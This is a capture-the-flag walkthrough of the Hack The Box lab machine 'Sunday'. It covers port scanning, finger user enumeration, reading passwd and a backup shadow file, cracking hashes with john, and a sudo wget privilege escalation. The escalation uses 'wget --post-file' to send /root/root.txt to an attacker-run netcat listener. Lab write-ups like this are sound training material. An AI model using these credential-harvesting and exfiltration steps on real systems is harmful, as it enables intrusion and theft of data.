Sunday Writeup
Introduction :
Sunday is an easy Solaris box that was released back in April 2018.
Part 1 : Initial Enumeration
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
**λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV -Pn 10.10.10.76**
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 05:36 CET
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 75.00% done; ETC: 05:38 (0:00:00 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.037s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
**79/tcp open finger Sun Solaris fingerd
|_finger: No one logged on\x0D**
111/tcp open rpcbind
765/tcp filtered webster
1839/tcp filtered netopia-vo1
1998/tcp filtered x25-svc-port
2910/tcp filtered tdaccess
9011/tcp filtered d-star
16018/tcp filtered unknown
54045/tcp filtered unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.78 seconds
Seems like we have alot of ports to work with. let's run another nmap scan, but this time to enumerate all the 65535 ports.
**λ nihilist [ 10.10.14.48/23 ] [~] → nmap -T4 -A -v -p- 10.10.10.76**
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 05:37 CET
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:37
Completed NSE at 05:37, 0.00s elapsed
Initiating NSE at 05:37
Completed NSE at 05:37, 0.00s elapsed
Initiating NSE at 05:37
Completed NSE at 05:37, 0.00s elapsed
Initiating Ping Scan at 05:37
Scanning 10.10.10.76 [2 ports]
Completed Ping Scan at 05:37, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:37
Completed Parallel DNS resolution of 1 host. at 05:37, 0.01s elapsed
Initiating Connect Scan at 05:37
Scanning 10.10.10.76 [65535 ports]
Discovered open port 111/tcp on 10.10.10.76
Increasing send delay for 10.10.10.76 from 0 to 5 due to 197 out of 492 dropped probes since last increase.
Increasing send delay for 10.10.10.76 from 5 to 10 due to max_successful_tryno increase to 5
Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
Connect Scan Timing: About 1.74% done; ETC: 06:07 (0:29:08 remaining)
Connect Scan Timing: About 3.72% done; ETC: 06:05 (0:26:17 remaining)
Connect Scan Timing: About 8.36% done; ETC: 06:04 (0:24:51 remaining)
Connect Scan Timing: About 12.54% done; ETC: 06:04 (0:23:29 remaining)
Connect Scan Timing: About 17.15% done; ETC: 06:04 (0:22:04 remaining)
Connect Scan Timing: About 21.93% done; ETC: 06:04 (0:20:43 remaining)
Connect Scan Timing: About 27.43% done; ETC: 06:04 (0:19:21 remaining)
Connect Scan Timing: About 32.63% done; ETC: 06:04 (0:18:00 remaining)
Connect Scan Timing: About 37.81% done; ETC: 06:04 (0:16:38 remaining)
**Discovered open port 22022/tcp on 10.10.10.76
Discovered open port 33890/tcp on 10.10.10.76**
Connect Scan Timing: About 43.04% done; ETC: 06:04 (0:15:15 remaining)
Connect Scan Timing: About 48.19% done; ETC: 06:04 (0:13:53 remaining)
Connect Scan Timing: About 53.48% done; ETC: 06:04 (0:12:33 remaining)
We have found the 22022nd and 33890th port, let's run yet another scan on these two ports to discover what service they are hosting.
λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.76 -p 22022,33890
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 09:15 CET
Nmap scan report for 10.10.10.76
Host is up (0.085s latency).
PORT STATE SERVICE VERSION
**22022/tcp open ssh SunSSH 1.3 (protocol 2.0)**
33890/tcp closed unknown
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.14 seconds
Seems like we have a SSH port to work with ! it is running the SunSSH 1.3 protocol.
we will also be looking at the 79th port : fingerd Solaris.
Part 2 : Getting User Access
Let's see what we can do with the 79th port that is running fingerd Solaris. We will be running the finger enumeration script by pentestmonkey : http://pentestmonkey.net/tools/user-enumeration/finger-user-enum
λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → perl finger-user-enum.pl -U rockyou.txt -t 10.10.10.76
######## Scan started at Wed Nov 20 09:58:10 2019 #########
**sammy** @10.10.10.76: sammy pts/2 10.10.14.48
**sunny** @10.10.10.76: sunny pts/3 10.10.14.48
We now have 2 users to work with ! sammy and sunny
λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → **ssh sunny@10.10.10.76 -p 22022**
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,**diffie-hellman-group1-sha1**
We need to allow a ssh key algorithm exchange method to the 10.10.10.76 host into our ~/.ssh/config file.
λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → echo "**Host 10.10.10.76** " >> ~/.ssh/config
λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → echo "**KexAlgorithms +diffie-hellman-group1-sha1** " >> ~/.ssh/config
λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → **ssh sunny@10.10.10.76 -p 22022**
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' cant be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. **SunOS 5.11** snv_111b November 2008
We see that the box is running SunOS 5.11, which is preety old, now we know why we needed to enable the old ssh algorithms for the client.
sunny@sunday:~$ cat /
cat: /: Is a directory
sunny@sunday:~$ CLEAR
-bash: CLEAR: command not found
sunny@sunday:~$
sunny@sunday:~$ cat /home/sunny/user.txt
Here we see that the box is awfully slow and unresponsive.
sunny@sunday:~/Desktop$ cd /export/home/sammy
sunny@sunday:/export/home/sammy$ ls
Desktop Documents Downloads Public
sunny@sunday:/export/home/sammy$ cd Desktop
sunny@sunday:/export/home/sammy/Desktop$ ls
user.txt
sunny@sunday:/export/home/sammy/Desktop$ cat user.txt
cat: user.txt: Permission denied
Navigating to /export/home/sammy/desktop we see that we do not have permissions to read user.txt Our next step is to try to print out /etc/passwd and /backup/shadow.backup
**sunny@sunday:/export/home/sammy/Desktop$ cat user.txt**
cat: user.txt: Permission denied
**sunny@sunday:/export/home/sammy/Desktop$ cat /etc/passwd**
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:x:15:3:Datalink Admin:/:
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:x:60:60:xVM User:/:
mysql:x:70:70:MySQL Reserved UID:/:
openldap:x:75:75:OpenLDAP User:/:
webservd:x:80:80:WebServer Reserved UID:/:
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
**sunny@sunday:/export/home/sammy/Desktop$ cat /backup/shadow.backup**
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Looking at the results we see that we have a few things to work with. we will be running the unshadow command onto the combination of the passwd.txt and shadow.txt files. First step is to save them locally, and we will run the command afterwards.
λ nihilist [ 10.10.14.48/23 ] [~] → cd _HTB
λ nihilist [ 10.10.14.48/23 ] [~/_HTB] → cd Sunday
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nano passwd.txt
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nano shadow.backup
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → ls
finger-user-enum-1.0 passwd.txt progress.graphml shadow.backup
**λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → unshadow passwd.txt shadow.backup**
Created directory: /home/nihilist/.john
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:x:15:3:Datalink Admin:/:
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:x:60:60:xVM User:/:
mysql:NP:70:70:MySQL Reserved UID:/:
openldap:*LK*:75:75:OpenLDAP User:/:
webservd:*LK*:80:80:WebServer Reserved UID:/:
postgres:NP:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:*LK*:95:12:Service Tag UID:/:
nobody:*LK*:60001:60001:NFS Anonymous Access User:/:
noaccess:*LK*:60002:60002:No Access User:/:
nobody4:*LK*:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:101:10:sammy:/export/home/sammy:/bin/bash
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:65535:1:sunny:/export/home/sunny:/bin/bash
**λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → unshadow passwd.txt shadow.backup > john_pwd.txt
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → john john_pwd.txt --wordlist='/usr/share/wordlists/rockyou.txt'**
We use the rockyou.txt wordlist in combination with the john command and we find the password "cooldude!" for the sammy user. Using that we try to log in through SSH once more but this time as the sammy user.
λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → ssh sammy@10.10.10.76 -p 22022
Password:
Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sammy@sunday:~$ ls
Desktop Documents Downloads Public
sammy@sunday:~$ cd Desktop
sammy@sunday:~/Desktop$ cat user.txt
**a3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
And we have been able to ssh as the sammy user ! We have finally been able to reveal the user flag.
Part 3 : Getting Root Access
First of all we run the sudo -l command to see what we can work with.
sammy@sunday:~/Desktop$ sudo -l
User sammy may run the following commands on this host:
**(root) NOPASSWD: /usr/bin/wget**
Interesting ! We seem to be able to run the wget command as root without any password. Let's run the command netcat command on a second terminal , and we will attempt to print out the root flag using wget's --post-file flag.
Terminal 2:
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → nc -lvnp **9001**
Terminal 1:
sammy@sunday:~/Desktop$ **sudo wget --post-file=/root/root.txt 10.10.14.48:9001**
--08:49:44-- http://10.10.14.48:9001/
=> `index.html'
Connecting to 10.10.14.48:9001... connected.
HTTP request sent, awaiting response...
Terminal 2:
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sunday] → **nc -lvnp 9001**
Connection from 10.10.10.76:48117
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept:
Host: 10.10.14.48:9001
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
**fbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
And that's it ! We have been able to print out the root flag.
Conclusion
Here we can see the progress graph :
Nihilist
8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o
7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8 Donate XMR to Nihilist: